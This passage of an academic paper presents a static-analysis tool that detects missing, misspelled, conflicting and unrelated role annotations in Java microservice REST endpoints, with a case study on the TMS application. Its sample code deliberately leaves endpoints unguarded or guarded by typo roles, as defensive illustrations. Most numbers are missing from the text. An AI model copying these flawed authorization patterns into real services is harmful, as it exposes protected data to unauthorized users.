in that case, it creates rest calls to other microservices and implements business logic based on the response. this describes a typical rest communication scenario among microservices. in particular, the service layer of one microservice makes rest calls to other microservices' controller layers to implement its business logic. thus, the rest endpoints of each microservice can be accessed either by end-users or by other microservices. enterprise frameworks have adopted annotation-based configuration to define rest endpoints, for example, the @restcontroller annotation in spring-based java applications and the @app.route annotation in flask-based python applications (vmware inc, ; pallets projects, ). since the rest endpoints are the entry points to the microservice, securing them is the single most important task for the developers. while there are several ways to enforce role-based authorization, the most widely adopted method in enterprise applications is to define authorization realms through the application server (oberle et al., ) or through separate identity management tools like keycloak (red hat inc, b). a realm is a security policy domain defined in the application server that contains a collection of users (jendrock et al., ). these users might be further organized into several groups (jendrock et al., ). centralized authorization systems like keycloak handle user authentication and role mapping. but such systems do not verify whether developers properly enforced rbac policies during api implementation or not. for example, some api endpoints might have missing rbac roles. in that case, any authenticated user can access those endpoints. similarly, two api endpoints with different roles might eventually access the same entity, which might be unintentional and left unnoticed. these inconsistencies are not flagged by the centralized authorization system, and thus defining authorization policies is not enough to secure the endpoints. developers need to enforce those policies within the application's source code that runs in that application server. designing proper authorization policies is just one part of ensuring robust rbac enforcement; we also need to consider coding problems that might lead to security loopholes. in this article, we focused on detecting such coding problems through static code analysis. also, it is important to classify these problems to understand their severity and origin. we have defined five types of possible inconsistencies or violations:

1. missing role violations: this type of violation occurs when an api endpoint does not have any roles associated with it. in this case, all authenticated users can access the endpoint. such a violation typically happens when developers forget to enforce authorization roles on an api endpoint. however, it could be a false positive; for example, some api endpoints might be intentionally left open for all users.

2. unknown access violations: if an api endpoint contains an authorization role that is not present in the user-defined role hierarchy, then we define it as an unknown access violation. usually this type of violation results from typographical errors, and in most cases such typos are left unnoticed since they do not cause any compilation errors. as a result, legitimate users with proper access are denied from accessing the endpoint.
3. entity access violations: if the input and output (that is, request and response) types of two api endpoints are similar but the endpoints have different authorization roles, we classify it as an entity access violation. this kind of violation indicates that the same entity is being accessed by users with different access roles.

4. conflicting hierarchy violations: this type of violation happens when an intermediate method in the service layer or repository layer contains two different roles where one is an ancestor of the other in the role hierarchy. this violation signifies that users with a junior role are accessing some functionality that might be intended for users with a senior role (walker et al., ).

5. unrelated access violations: similar to conflicting hierarchy violations, these focus on intermediate methods instead of endpoint methods. when an intermediate method contains multiple roles that are located in different subtrees of the role hierarchy, we classify it as an unrelated access violation. this type of violation indicates poorly separated concerns while distributing access roles across different functionalities of the application (walker et al., ).

like rest configurations, authorization policies are typically applied by annotating methods or functions with appropriate security annotations. these annotations can differ based on the framework used to develop the application; for example, jax-rs security annotations are used with java ee based applications (oracle, ). a similar approach to enforcing rbac using annotations can also be found in python applications based on the flask framework (thio, ). these security annotations define the level of restriction applied to the associated methods or functions. the table below highlights the most commonly used security annotations in java ee applications supported by jsr (mordani, ; oracle, ).

table: java ee security annotations.
  @permitall: all security roles are permitted
  @denyall: no security roles are permitted
  @rolesallowed: list of permitted security roles

for example, if we add a @rolesallowed(admin) annotation to a controller endpoint method, only the users that have the "admin" role (defined in the realms) can access the endpoint. however, since the number of such endpoint methods can be significant and can grow over each iteration of the development cycle, it is possible to introduce inconsistencies among the allowed roles or even missing roles. moreover, since these inconsistencies and missing roles do not cause any compilation or runtime errors, it is tempting for developers to overlook them, and that might result in potential security loopholes. our proposed method analyzes a set of microservice artifacts that communicate with each other through rest calls. it finds potential rbac violations for the whole microservice mesh by scraping the security metadata of individual microservices and combining them based on their rest communication flow. we divided the analyzer into three modules: a discovery module, a flow-matcher module, and an analysis module. the discovery module implements the extraction phase of sar; it collects endpoint specifications and security metadata. next, the flow-matcher module performs the construction and manipulation phases of sar by resolving the interaction among microservices. finally, the analysis module completes the analysis phase of sar and detects potential rbac violations based on the other two modules' output.
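as a hedged illustration of these annotation-driven policies, and of how the first two violation types creep in, consider the following hypothetical jax-rs resource; the paths and role names are invented for this sketch and do not come from any system discussed in this article.

    import javax.annotation.security.PermitAll;
    import javax.annotation.security.RolesAllowed;
    import javax.ws.rs.GET;
    import javax.ws.rs.Path;

    @Path("/reports")
    public class ReportResource {

        @GET
        @Path("/summary")
        @RolesAllowed("admin")       // only users mapped to the "admin" role in the realm may call this
        public String summary() { return "summary"; }

        @GET
        @Path("/archive")
        @RolesAllowed("amdin")       // misspelled role: compiles fine, but is an unknown access violation candidate
        public String archive() { return "archive"; }

        @GET
        @Path("/stats")
        @PermitAll                   // explicitly open to every role
        public String stats() { return "stats"; }

        @GET
        @Path("/internal")           // no security annotation at all: a missing role violation candidate
        public String internal() { return "internal"; }
    }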
the discovery module performs static code analysis on individual microservice artifacts. it detects the rest endpoints and the security roles attached to those endpoints. apart from that, it also lists the rest calls to other microservices, which are typically implemented in the service layer. the discovery module works for both source code artifacts and bytecode artifacts (e.g., jar files, python bytecode) and thus generalizes to both interpreted languages (e.g., java, python) and compiled languages (e.g., c++, go). the source code version of the discovery module takes a microservice artifact as input and parses class definitions, while the bytecode version does the same using bytecode analysis. as discussed above, both rest endpoints and security policies are typically defined using annotation-based configuration in enterprise applications. the descriptions of these annotations are well structured and preserved in the source code and in the bytecode. the discovery module scans each class to find the rest annotations and security annotations that define rest endpoints and security roles, respectively. it aggregates class-level annotations with method-level annotations to derive the complete definition of each rest endpoint. it collects the allowed roles, port, path, http type, type of request object, and type of response object for each endpoint. it accounts for all standard http types, with the most commonly used ones being get, post, put, and delete. the discovery module then further analyzes service layer classes to detect rest calls to other microservices. for each rest call, it detects the url, http type, type of request object, and type of response object. it parses rest client definitions to gather those attributes. however, detecting the url string involves further intensive analysis, since the url string is usually constructed by performing consecutive append operations in different parts of the source code. for this, our discovery module applies a backward recursive data flow analysis from the point where the url is used to the point where the url was initialized. in each intermediate step of the data flow where the url was referenced, it scans for any append operations and resolves them to restore the final url. parts of the url may also be constructed using values defined in configuration files instead of hardcoded strings within the source code; our module also scans the configuration files of the project to resolve those values. finally, the discovery module generates method-call graphs for individual microservices. it takes each controller method as the root node and populates child nodes by traversing subsequent method calls to the service layer and repository layer methods. for each microservice, the discovery module organizes all the scraped information described above into a usable structure and passes it to the flow matcher module and the analysis module.
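the following sketch shows the kind of service-layer rest call and piecewise url construction that this backward data-flow analysis has to resolve; the service name, configuration key, and endpoint path are assumptions made for the example.

    import org.springframework.beans.factory.annotation.Value;
    import org.springframework.stereotype.Service;
    import org.springframework.web.client.RestTemplate;

    @Service
    public class UserClientService {

        @Value("${ums.base-url}")               // part of the url comes from a configuration file
        private String umsBaseUrl;

        private final RestTemplate restTemplate = new RestTemplate();

        public UserDto fetchUser(long userId) {
            // the final url is assembled through consecutive append operations; the backward
            // data-flow analysis walks from the call site below back to these appends
            String url = umsBaseUrl;
            url = url + "/users/";
            url = url + userId;
            return restTemplate.getForObject(url, UserDto.class);   // http get, response type UserDto
        }

        public static class UserDto { public long id; public String name; }
    }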
as discussed by walker et al. ( ), rbac security analysis of individual microservices is insufficient. it fails to acknowledge violations in which an end-user gains access to a normally restricted resource by creating a proxy request through another microservice that mediates the resource access through service-layer rest calls. to detect such violations, we need to consider the whole msa mesh instead of a single msa, and we need to resolve the rest communications between microservices to construct a complete centralized perspective. in our proposed model, the flow matcher module constructs the centralized communication graph for the whole msa mesh. it takes the descriptions of rest endpoints and rest calls for each microservice prepared by the discovery module. it combines all the rest endpoints into one list and all the rest calls into another list, and then performs a brute-force matching between those two lists to resolve all rest communications among the microservices. this involves matching the url (including port and path), http method, request type, and response type. however, it is common for modern microservices to use service discovery and a service registry instead of a hardcoded ip address in the url (montesi & weber, ). to resolve this, our flow matcher module compares both the ip address and the service name and accepts the pair if either matches. the service name is usually defined in each microservice's configuration files and is scraped during the discovery phase. the flow matcher module also generates a diagram of the rest communication for the whole microservice mesh for better visualization. the analysis module takes the descriptions of method-call graphs and allowed roles from the discovery module and the rest communication descriptions from the flow matcher module. additionally, it takes the role hierarchy tree from the user. the role hierarchy figure below shows a user-defined role tree passed to the analysis module as input. roles higher in the hierarchy tree are senior to the roles below them; senior roles should have all the access rights junior roles have, plus additional rights the junior roles do not have. roles in separate paths of the hierarchy are not related to each other. the analysis module combines the method-call graphs of different microservices based on their rest communication; a typical scenario of how combined method-call graphs are constructed is depicted in the corresponding figure below. each node of the combined graphs can be a controller node, a service node, or a repository node. typically, only the controller nodes contain rbac information, that is, a list of allowed roles; however, the service layer and repository layer nodes can also have rbac information. to find potential rbac violations in those layers, the analysis module loops through all the nodes and analyzes the roles associated with them. the first three types of violations are related only to controller nodes. if a controller node does not have any roles associated with it, we detect it as a missing role violation; this is the most common type of violation, since missing roles on controller methods do not cause any compilation errors. if a node contains a role that is not defined in the user-provided role hierarchy, we detect it as an unknown access violation; this type of violation typically results from typographical errors. if the request types, response types, and http types of two controller methods are equal but they have different rbac roles, we detect it as an entity access violation; this violation implies similar access to a particular entity with different roles.
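the following is a simplified sketch of these controller-node checks; the endpoint record and its fields are assumptions made for the example, not the tool's actual data model.

    import java.util.*;

    class EndpointNode {
        String qualifiedName; Set<String> roles; String httpType; String requestType; String responseType;
        EndpointNode(String n, Set<String> r, String h, String req, String res) {
            qualifiedName = n; roles = r; httpType = h; requestType = req; responseType = res;
        }
    }

    class ControllerChecks {
        static List<String> check(List<EndpointNode> endpoints, Set<String> knownRoles) {
            List<String> report = new ArrayList<>();
            for (EndpointNode e : endpoints) {
                if (e.roles.isEmpty())
                    report.add("missing role violation at " + e.qualifiedName);
                for (String role : e.roles)
                    if (!knownRoles.contains(role))
                        report.add("unknown access violation (" + role + ") at " + e.qualifiedName);
            }
            // entity access: equal request, response, and http types but different role sets
            for (int i = 0; i < endpoints.size(); i++)
                for (int j = i + 1; j < endpoints.size(); j++) {
                    EndpointNode a = endpoints.get(i), b = endpoints.get(j);
                    boolean sameEntity = a.httpType.equals(b.httpType)
                            && a.requestType.equals(b.requestType)
                            && a.responseType.equals(b.responseType);
                    if (sameEntity && !a.roles.equals(b.roles))
                        report.add("entity access violation between " + a.qualifiedName + " and " + b.qualifiedName);
                }
            return report;
        }
    }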
the unrelated access and conflicting hierarchy violations occur when a node contains multiple roles after performing the reduction and aggregation. in the reduction phase, the analysis module goes through each node and keeps only the lowest role defined in the user-provided role hierarchy. the significance of this reduction is that it defines the minimum role required to access a specific part of the application. after reduction, in the aggregation phase, the analyzer traverses each graph and copies the allowed roles from the parent node to the child node. if a child node already contains an rbac role, or a child node has multiple parents with different roles, then it aggregates the roles for that particular child node. the reduction-and-aggregation figure shows how the analysis module labels each child node using the rbac roles of its parent nodes according to the user-defined role hierarchy. the conflicting hierarchy violation occurs when a node contains two different roles where one role is an ancestor of the other in the user-defined role hierarchy. this violation indicates a place where a junior role potentially accesses an area reserved for a more senior role. it is only a potential violation because it is ambiguous whether a junior role is accessing an area reserved for a senior role or the senior role is accessing something allowed for the junior role (walker et al., ).

[figure: a sample user-defined role hierarchy tree. senior roles are higher in the tree; in this example, role s is the most senior role, role a is senior to role b, which is senior to role c, and role p is senior to role q.]

[figure: construction of combined method-call graphs, showing the per-microservice graphs of microservice a and microservice b extracted from jar files by the discovery module, connected by the flow matcher module via a get rest call, and combined by the analysis module into the application-wide graph of application x.]
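the reduction, aggregation, and conflicting-hierarchy check can be sketched as follows; modeling the role hierarchy as a child-to-parent map is an assumption of this sketch. with the sample hierarchy above, reduce({a, c}) keeps only {c}, and hasConflictingHierarchy({a, c}) is true while it is false for {a, p}.

    import java.util.*;

    class RoleHierarchy {
        final Map<String, String> parentOf;                       // child role -> its senior (parent) role
        RoleHierarchy(Map<String, String> parentOf) { this.parentOf = parentOf; }

        boolean isAncestor(String senior, String junior) {        // true if senior is above junior in the tree
            for (String r = parentOf.get(junior); r != null; r = parentOf.get(r))
                if (r.equals(senior)) return true;
            return false;
        }

        // reduction: keep only the most junior roles of a node's role set
        Set<String> reduce(Set<String> roles) {
            Set<String> kept = new HashSet<>(roles);
            for (String a : roles)
                for (String b : roles)
                    if (!a.equals(b) && isAncestor(a, b)) kept.remove(a);   // a is senior to b, drop a
            return kept;
        }

        // aggregation: a child node inherits its parent node's (already reduced) roles
        Set<String> aggregate(Set<String> childRoles, Set<String> parentRoles) {
            Set<String> merged = new HashSet<>(childRoles);
            merged.addAll(parentRoles);
            return merged;
        }

        // conflicting hierarchy: two roles on one node where one is an ancestor of the other
        boolean hasConflictingHierarchy(Set<String> roles) {
            for (String a : roles)
                for (String b : roles)
                    if (!a.equals(b) && (isAncestor(a, b) || isAncestor(b, a))) return true;
            return false;
        }
    }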
it warns the developer about potential violations by providing a report of specific locations where the violations are detected and the categories, as discussed above. while some of the detected violations may be false-positive and intentional, our proposed method provides an overall idea of all possible rbac violations for a large and complex system. the categorization of the violations helps the developer understand each violation’s severity, while the specific locations of the violations help to find and fix them easily. case study the tms is an enterprise application developed at baylor university for central texas computational thinking, coding, and tinkering to facilitate the texas educator controllermethod roles: {a,b,c} controllermethod roles: {p,q} servicemethod servicemethod repositorymethod repositorymethod controllermethod roles: {c} controllermethod roles: {q} servicemethod servicemethod repositorymethod repositorymethod controllermethod roles: {c} controllermethod roles: {q} servicemethod roles: {c} servicemethod roles: {q} repositorymethod roles: {c,q} repositorymethod roles: {q} reduction aggregation figure reduction and aggregation of rbac roles. full-size doi: . /peerj-cs. /fig- https://github.com/cloudhubs/tms . das et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- https://github.com/cloudhubs/tms http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ certification training program. the whole tms system consists of four individual microservices: user management system (ums), question management system (qms), exam management system (ems) and configuration management system (cms). all of the microservices are developed using the spring boot framework (walls, ) and structured into the controller, service, and repository layers. the rbac authorization is enforced using annotations on each controller method for the individual microservices, while the central authentication and authorization policies are defined using keycloak (red hat inc, a). figure shows the role hierarchy tree for the tms application. for our case study, we added mutants (jia & harman, ) for each type of violations that resulted in a total of seven rbac violations. our system successfully detected all those violations and provided a report with specific locations of the violations. in this section, we will discuss how our analysis process works in detail for the mutated application. the tms project utilizes an annotation-based configuration technique to define application layers. rest api configurations and rbac restrictions are also applied through annotations, which are common practice for enterprise applications. table lists frequently used annotations throughout the tms project. for our purpose, we only looked for the @restcontroller annotation in the discovery module. the http and paths type were extracted from the parameters of @requestmapping annotation or subtype annotations. paths can be defined at both class level or method level. we aggregated the class level paths with method-level paths to get the final path for each endpoint. the endpoints’ request and response types are superadmin reviewermoderator guestuseradmin figure role hierarchy tree of the tms application. full-size doi: . /peerj-cs. /fig- table annotations used in tms project. 
the endpoints' request and response types are resolved by detecting the parameters and return types of the respective methods where the endpoints are defined. finally, the rbac roles are listed by detecting the parameters of the @rolesallowed annotation applied to each endpoint method. the resttemplate class is usually used for making rest calls in spring boot applications, where methods such as getforobject and postforobject perform rest calls with a specific http type. each of those methods takes a url parameter and a request object and returns a response object. to detect service-layer rest calls, we scan classes annotated with the @service annotation and keep those that contain resttemplate in their import statements. we then look for the methods described above and detect the request and response types by checking the parameter types and return type. the urls are detected by recursively performing a backward data flow analysis, as described in the proposed method section. the method-call graph is constructed by traversing each endpoint method down to the service layer and repository layer methods. after the discovery module completes gathering metadata for each msa, the flow matcher module combines them, and the analysis module performs the final analysis. the flow matcher module also generates a visual graph of the rest communications among the microservices using the graphviz library (ellson et al., ); the generated graph for the tms application is shown in the corresponding figure.

[figure: inter-microservice rest communications in tms.]

while matching the request and response types, we only considered the supertype of the generic types; for example, list<aclass> and arraylist<aclass> are considered equal during matching. our analyzer reported two missing-role violations for the mutated application by specifying the fully qualified names (msa name + package name + class name + method name) of the endpoint methods that are defined without any rbac roles. it detected two unknown access violations along with their locations; these two violations resulted from data entry errors where the "user" and "admin" roles were mistyped as "usre" and a misspelled variant of "admin", respectively, neither of which is present in the role hierarchy shown above. our analyzer flagged one entity access violation by pointing out a pair of fully qualified method names: the methods getexams and getinitexams in cms have the same return type list<exam> and the same http type get, but they have different rbac roles, "user" and "moderator" respectively.
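the shape of that entity access violation can be sketched as follows; this is not the actual tms source, only a hedged reconstruction of two get endpoints that return the same entity type while being guarded by different roles.

    import java.util.List;
    import javax.annotation.security.RolesAllowed;
    import org.springframework.web.bind.annotation.GetMapping;
    import org.springframework.web.bind.annotation.RestController;

    @RestController
    public class ExamQueryController {

        public static class Exam { public String name; }

        @GetMapping("/exams")
        @RolesAllowed("user")                     // one role
        public List<Exam> getExams() { return List.of(new Exam()); }

        @GetMapping("/exams/init")
        @RolesAllowed("moderator")                // same entity and http type, different role: flagged
        public List<Exam> getInitExams() { return List.of(new Exam()); }
    }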
we found two conflicting hierarchy violations in the mutated tms application. one of them occurred in inter-microservice communication, where the cms module calls the ums module to retrieve examinee info. the getexaminee endpoint method in cms can be accessed with the "user" role and calls the getuserbyid endpoint method of ums via a service-layer rest call. however, the getuserbyid method in ums is annotated with the "admin" role, which is a direct ancestor of the "user" role.

[figure: conflicting hierarchy violation among cms and ums (get call from cms to ums). nodes: configurationcontroller::getexaminee() roles {user, admin}, reduced and aggregated to {user}; umsservice::getexamineeinfo() roles {}, aggregated to {user}; userinfocontroller::getuserbyid() roles {admin, superadmin}, aggregated to {user, admin}; userrepository::getbyid() roles {}, aggregated to {user, admin}.]

the second conflicting hierarchy violation occurred entirely within the qms module, where both the createcategory and deletecategory endpoint methods call the save method of categoryrepository with conflicting roles.

[figure: conflicting hierarchy violation within qms. nodes: categorycontroller::createcategory() roles {user, admin, superadmin}; categorycontroller::deletecategory() roles {admin, superadmin}; categoryrepository::save() roles {user, admin}; categoryrepository::delete() roles {admin}.]

finally, we detected one unrelated access violation between cms and ems, where the method getquestions in cms has transitive access to the method listallquestionsforexam in ems via a service-layer rest call. they are annotated with the "user" and "moderator" roles, respectively, which are defined in separate subtrees of the role hierarchy. we tested both the source code and bytecode versions of our discovery module, which uses the javaparser library (bruggen, ) to parse source code and the javassist library (jboss, ) to perform bytecode analysis and extract class definitions. we published our implementation as an open-source tool (sar from bytecode: https://github.com/cloudhubs/rad; sar from source code: https://github.com/cloudhubs/rad-source; rbac analysis: https://github.com/cloudhubs/rad-analysis). we ran it against the tms project to benchmark our analyzer and separately measured the runtime of the discovery, flow matcher, and analysis modules. for the discovery module, we break down our measurements per microservice (cms, qms, ems, and ums) and count the number of classes it scanned. note that the discovery module performs a deep scan of controller-layer classes annotated with @restcontroller and of service-layer classes that import resttemplate, in order to detect rest endpoints, security roles, and rest calls; for the other classes, it performs only a shallow scan to construct the method-call graphs. the runtime table below shows the total runtime for each module and the breakdown for the discovery module for static bytecode analysis. we can immediately see that the discovery module takes the most significant time, since it scans all class files to extract metadata. in contrast, the flow-matcher and analysis modules, operating on the extracted metadata, take comparatively less time. for the discovery module, the runtime depends on the number of class files in each microservice. the runtime of the flow-matcher module depends on the number of rest endpoints and the number of rest calls, while the runtime of the analysis module depends on the number of inter-microservice rest connections and the depth of the function call graph.
our experiment exhibits a reasonable runtime for performing static code analysis on enterprise applications. in total, it took . seconds against the tms application, which consists of four microservices, a total of classes, and inter-microservice rest connections. for enterprise applications with many microservices, it is possible to run the discovery module in parallel for multiple microservices, which will significantly reduce the runtime.

table: runtime against the tms testbed.
  module         total runtime (s)   per-msa breakdown (s)
  discovery      .                   cms: . | ems: . | qms: . | ums: .
  flow matcher   .                   -
  analysis       .                   -
(the benchmark is run on a mac os computer with a . ghz -core intel core i processor and gb ram.)

figure: rbac assessment pseudocode.
  rbacassessment(pathtomicroservices, rolehierarchy) {
    // extract metadata
    for each path in pathtomicroservices {
      analyze project property files to get service-name, port, hard-coded string values, etc.
      extract class definitions using static code analysis
      // populate serverlist and clientlist
      for each class {
        for each method {
          if the method is annotated with rest annotations {
            extract api endpoint definition metadata
            add extracted metadata to serverlist
            follow each method call to create a method call graph
            extract rbac security roles associated with those methods
            add the graph to methodcallgraph as a subgraph
          }
          if the method contains rest api calls {
            extract api call descriptions, e.g. http method, url, etc.
            add extracted metadata to clientlist
          }
        }
      }
    }
    // resolve inter-microservice rest connections
    for each server in serverlist {
      for each client in clientlist {
        if url, port, and http method match for server and client {
          add the (server, client) pair to restconnections
        }
      }
    }
    // update the method call graph
    for each connection in restconnections {
      add an edge from client to server in methodcallgraph
    }
    // reduction
    for each method in methodcallgraph {
      keep only the lowest role in rolehierarchy and discard the others
    }
    // aggregation
    for each disjoint subgraph in methodcallgraph {
      traverse all paths and merge the roles from parent to child
    }
    // find inconsistencies
    for each method in methodcallgraph {
      if the method has conflicting roles according to rolehierarchy {
        report an inconsistency
      }
    }
  }

to reason about the performance of our method on larger systems, consider the pseudocode given in the figure above. the amount of work scales linearly with the number of methods in the system and with the product of the number of rest endpoints and rest calls, meaning our algorithm runs in o(m + e x c), where m is the number of methods, e is the number of rest endpoints, and c is the number of rest calls. since the number of methods in a system is usually much larger than the number of rest calls and endpoints, our algorithm will usually run in o(m).
this is in line with the results of our experiment; the discovery module, which searches every method for the needed metadata, was responsible for the majority of the time taken.

threats to validity
there are several threats to the validity of our work to address; some of them arise from our experiment and some from how generalizable our approach is.

internal threats to validity
the primary threats to the validity of our experiment are the accuracy of the detected violations and the accuracy of the performance measures. since we introduced known mutants for the errors, we know our tool accurately detected all of the issues. performance-wise, we showed that our tool performed well on a small-sized application and that the algorithm should scale up well to larger applications, since the most expensive portion of the analysis scales only linearly with the number of methods in the project.

external threats to validity
there are three external threats to our work's validity, which may affect how generalizable our results are. first, some of the detected inconsistencies might be false positives, that is, they might be intentionally left behind by the developers. second, the approach depends on a user-defined role hierarchy that is assumed to contain roles universal to the application. this may not be true if users are defined in separate security realms; a role name in one realm may not be equivalent to the same role name in a different realm, either in its own access rights or in its relative position in the role hierarchy. in this case, a mapping would have to be supplied, showing which roles, if any, should be equivalent across the different realms. another limitation is the reliance on security annotations. if security policies are implemented by means other than annotations, or are defined in a language or framework that does not support annotations, the current approach would not detect the roles. however, if another method were used to extract the allowed roles, its output could be used in the rest of the analysis process.

conclusion
we introduced a novel solution to automatically detect authorization inconsistencies in the rbac implementation of enterprise applications using automated sar. our solution categorizes the violations into five types: missing-role violations, unknown access violations, entity access violations, unrelated access violations, and conflicting hierarchy violations. our analyzer scans a set of microservice artifacts and provides a report listing all the possible violations, pinpointing their locations and types. while some of the detected violations may be false positives, the violation type, along with a specific location, helps the developer easily debug them, fix them, or discard them if they were intentional. although our analyzer was developed for a java enterprise application, our proposed approach is not restricted to any particular programming language or framework; it can easily be implemented for other languages and frameworks, since all modern languages now have a well-structured abstraction for rest apis and rbac policies. one major shortcoming of our method is that it assumes the role hierarchy and the association of users with roles are defined centrally. however, individual microservices can have separate role hierarchies or even different user-role associations. similarly, trust management can be distributed across multiple domains, as in drbac.
in the future, we will extend our system to address these issues by allowing multiple role hierarchies and multiple role mappings, along with their decentralization. besides, we would like to experiment with role assignment within a user session to identify possible inconsistencies while enforcing dsd. our long-term goal is to perform such analysis within the cloud-native environment commonly used in production deployments, for example, analyzing dockerfiles and kubernetes artifacts.

additional information and declarations

funding
this material is based upon work supported by the national science foundation under grant no. and a grant from red hat research. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures
the following grant information was disclosed by the authors: national science foundation: . red hat research.

competing interests
the authors declare that they have no competing interests.

author contributions
- dipta das conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.
- andrew walker conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft.
- vincent bushong conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft.
- jan svacina conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft.
- tomas cerny conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft.
- vashek matyas conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft.

data availability
the following information was supplied regarding data availability: data and analysis are available at github, specifically:
- bytecode analysis: https://github.com/cloudhubs/rad
- source code analysis: https://github.com/cloudhubs/rad-source
- rbac analysis: https://github.com/cloudhubs/rad-analysis

references
ahn g-j, sandhu r. role-based authorization constraints specification. acm transactions on information and system security.
alshuqayran n, ali n, evans r. towards micro service architecture recovery: an empirical study. in: ieee international conference on software architecture (icsa). piscataway: ieee.
alur d, malks d, crupi j, booch g, fowler m. core j2ee patterns (core design series): best practices and design strategies. second edition. santa clara: sun microsystems, inc.
basin d, burri sj, karjoth g. dynamic enforcement of abstract separation of duty constraints. in: backes m, ning p, eds. computer security - esorics. berlin: springer.
bass l, clements p, kazman r. software architecture in practice. boston: addison-wesley professional.
brachmann e, dittmann g, schubert k-d. simplified authentication and authorization for restful services in trusted environments. in: de paoli f, pimentel e, zavattaro g, eds. service-oriented and cloud computing. berlin: springer.
bruggen dv. javaparser: analyse, transform and generate your java codebase. available at https://javaparser.org.
castillo p, bernier j, arenas m, merelo guervós j, garcía-sánchez p. soap vs rest: comparing a master-slave ga implementation. arxiv preprint.
cicchetti a, di ruscio d, iovino l, pierantonio a. managing the evolution of data-intensive web applications by model-driven techniques. software & systems modeling.
ciuciu i, tang y, meersman r. towards evaluating an ontology-based data matching strategy for retrieval and recommendation of security annotations for business process models. in: aberer k, damiani e, dillon t, eds. data-driven process discovery and analysis. berlin: springer.
ellson j, gansner e, koutsofios l, north sc, woodhull g. graphviz - open source graph drawing tools. in: mutzel p, jünger m, leipert s, eds. graph drawing. berlin: springer.
ferraiolo df, cugini ja, kuhn dr. role-based access control (rbac): features and motivations. in: proceedings of the annual computer security applications conference.
freudenthal e, pesin t, port l, keenan e, karamcheti v. drbac: distributed role-based access control for dynamic coalition environments. in: proceedings of the international conference on distributed computing systems.
granchelli g, cardarelli m, di francesco p, malavolta i, iovino l, di salle a. towards recovering the software architecture of microservice-based systems. in: ieee international conference on software architecture workshops (icsaw). piscataway: ieee.
habib ma, mahmood n, shahid m, aftab mu, ahmad u, nadeem faisal cm. permission based implementation of dynamic separation of duty (dsd) in role based access control (rbac). in: international conference on signal processing and communication systems (icspcs).
hunsaker c. rest vs soap: when is rest better for web service interfaces? available at https://stormpath.com/blog/rest-vs-soap.
ibrahim a, bozhinoski s, pretschner a. attack graph generation for microservice architecture. in: proceedings of the acm/sigapp symposium on applied computing (sac). new york: association for computing machinery.
jboss. javassist: java bytecode engineering toolkit. available at https://www.javassist.org.
jendrock e, evans i, gollapudi d, haase k, srivathsa c, cervera-navarro r, markito w. working with realms, users, groups, and roles. in: the java ee tutorial. boston: addison-wesley professional.
jia y, harman m. an analysis and survey of the development of mutation testing. ieee transactions on software engineering.
lee s, jo j, kim y. method for secure restful web service. in: ieee/acis international conference on computer and information science (icis).
mcgraw g. software security. ieee security & privacy magazine.
mohanty h, mohanty j, balakrishnan a. trends in software testing. singapore: springer.
montesi f, weber j. circuit breakers, discovery, and api gateways in microservices. arxiv preprint.
mordani r. jsr: common annotations for the java platform. available at https://jcp.org/en/jsr/detail?id= .
oberle d, eberhart a, staab s, volz r. developing and managing software components in an ontology-based application server. in: jacobsen h-a, ed. middleware. berlin: springer.
omicini a, ricci a, viroli m. rbac for organisation and security in an agent coordination infrastructure. electronic notes in theoretical computer science.
oracle. securing restful web services using java security annotations. available at https://docs.oracle.com/middleware/ /wls/restf/secure-restful-service.htm#restf.
pallets projects. flask documentation quickstart. available at https://flask.palletsprojects.com/en/ . .x/quickstart.
quay. clair: vulnerability static analysis for containers. github. available at https://github.com/quay/clair.
rademacher f, sachweh s, zündorf a. a modeling method for systematic architecture reconstruction of microservice-based software systems. in: nurcan s, reinhartz-berger i, soffer p, zdravkovic j, eds. enterprise, business-process and information systems modeling. cham: springer international publishing.
rademacher f, sorgalla j, wizenty p, sachweh s, zündorf a. graphical and textual model-driven microservice development. cham: springer international publishing.
red hat inc. a. keycloak. available at https://www.keycloak.org.
red hat inc. b. keycloak authorization services guide. available at https://www.keycloak.org/docs/latest/authorization_services.
richards m. layered architecture. in: software architecture patterns. newton: o'reilly media, inc.
salah t, jamal zemerly m, yeun cy, al-qutayri m, al-hammadi y. the evolution of distributed systems towards microservices architecture. in: international conference for internet technology and secured transactions (icitst).
sandhu rs. separation of duties in computerized information systems. in: dbsec. halifax: citeseer.
sandhu rs, coyne ej, feinstein hl, youman ce. role-based access control models. computer.
sandhu rs, samarati p. access control: principle and practice. ieee communications magazine.
scarioni c, nardone m. pro spring security: securing spring framework and boot-based java applications. berlin: springer.
son s, mckinley ks, shmatikov v. fix me up: repairing access-control bugs in web applications. in: network and distributed system security symposium.
srivastava v, bond md, mckinley ks, shmatikov v. a security policy oracle: detecting security holes using multiple api implementations. in: proceedings of the acm sigplan conference on programming language design and implementation (pldi). new york: association for computing machinery.
steinegger r, giessler p, hippchen b, abeck s. overview of a domain-driven design approach to build microservice-based applications. in: softeng: the third international conference on advances and trends in software engineering.
sudhakar a. techniques for securing rest. ca technology exchange.
swinhoe d. the biggest data breaches of the 21st century. available at https://www.csoonline.com/article/ /the-biggest-data-breaches-of-the- st-century.html.
thio l. role-based authorization - flask-user documentation. available at https://flask-user.readthedocs.io/en/latest/authorization.html.
tihomirovs j, grabis j. comparison of soap and rest based web services using software evaluation metrics. information technology and management science.
vmware inc. building a restful web service. available at https://spring.io/guides/gs/rest-service.
vural h, koyuncu m, guney s. a systematic literature review on microservices. in: gervasi o, murgante b, misra s, borruso g, torre cm, rocha ama, taniar d, apduhan bo, stankova e, cuzzocrea a, eds. computational science and its applications - iccsa. cham: springer international publishing.
wagh dk, thool r. a comparative study of soap vs rest web services provisioning techniques for mobile host. journal of information engineering and applications.
walker a, svacina j, simmons j, cerny t. on automated role-based access control assessment in enterprise systems. in: kim kj, kim h-y, eds. information science and applications. singapore: springer.
walls c. spring boot in action. first edition. shelter island: manning publications co.
